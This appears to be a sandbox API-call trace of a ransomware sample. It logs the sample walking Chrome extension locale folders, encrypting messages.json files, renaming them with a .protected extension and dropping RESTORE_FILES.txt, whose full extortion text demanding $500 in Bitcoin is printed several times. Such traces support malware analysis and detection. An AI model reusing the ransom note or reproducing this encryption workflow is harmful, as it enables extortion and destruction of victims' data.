[0080.033] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json") returned 158 [0080.033] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json") returned 158 [0080.033] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.033] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.034] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.034] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.034] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.034] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.034] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.034] CloseHandle (hObject=0x168) returned 1 [0080.035] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.protected") returned 168 [0080.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0080.035] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.035] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.035] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 162 [0080.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0080.035] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.035] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.036] lstrlenA (lpString="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") returned 684 [0080.036] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0080.036] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.036] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.036] CloseHandle (hObject=0x164) returned 1 [0080.036] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.036] lstrcmpiW (lpString1="en_US", lpString2="Windows") returned -1 [0080.036] lstrcmpiW (lpString1="en_US", lpString2="Program Files") returned -1 [0080.036] lstrcmpiW (lpString1="en_US", lpString2="Program Files (x86)") returned -1 [0080.036] lstrcmpiW (lpString1="en_US", lpString2="$Recycle.bin") returned 1 [0080.037] lstrcmpiW (lpString1="en_US", lpString2="System Volume Information") returned -1 [0080.037] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US") returned 144 [0080.037] lstrcmpW (lpString1="en_US", lpString2=".") returned 1 [0080.037] lstrcmpW (lpString1="en_US", lpString2="..") returned 1 [0080.037] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\*") returned 146 [0080.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0080.037] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.037] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.037] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.037] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.037] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.037] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\.") returned 146 [0080.037] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.037] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.037] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.037] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.037] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.037] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.037] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.037] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\..") returned 147 [0080.037] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.037] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.037] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.037] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.037] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.037] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.037] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.037] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.037] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json") returned 158 [0080.037] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.037] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.038] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.038] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json") returned 158 [0080.038] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json") returned 158 [0080.038] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json") returned 158 [0080.039] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.039] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.039] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.039] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.039] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.039] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.040] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.040] CloseHandle (hObject=0x168) returned 1 [0080.040] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.protected") returned 168 [0080.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json.protected")) returned 1 [0080.040] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.040] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.040] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\RESTORE_FILES.txt") returned 162 [0080.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0080.041] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.041] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.041] lstrlenA (lpString="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") returned 684 [0080.041] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0080.041] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.041] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.042] CloseHandle (hObject=0x164) returned 1 [0080.042] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.042] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0080.042] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0080.042] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0080.042] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0080.042] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0080.042] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es") returned 141 [0080.042] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0080.042] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0080.042] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\*") returned 143 [0080.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0080.042] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.042] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.042] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.042] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.042] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.042] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\.") returned 143 [0080.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.042] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.042] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.042] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.042] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.042] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.042] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.042] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\..") returned 144 [0080.042] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.042] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.042] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.042] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.042] lstrcmpiW (lpString1="messages.json", lpString2="Program Files 
(x86)") returned -1 [0080.042] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.042] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.043] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json") returned 155 [0080.043] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.043] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.043] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.043] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json") returned 155 [0080.043] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json") returned 155 [0080.043] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json") returned 155 [0080.043] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.043] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.044] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.044] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.044] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.044] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.044] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.044] CloseHandle (hObject=0x168) returned 1 [0080.044] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
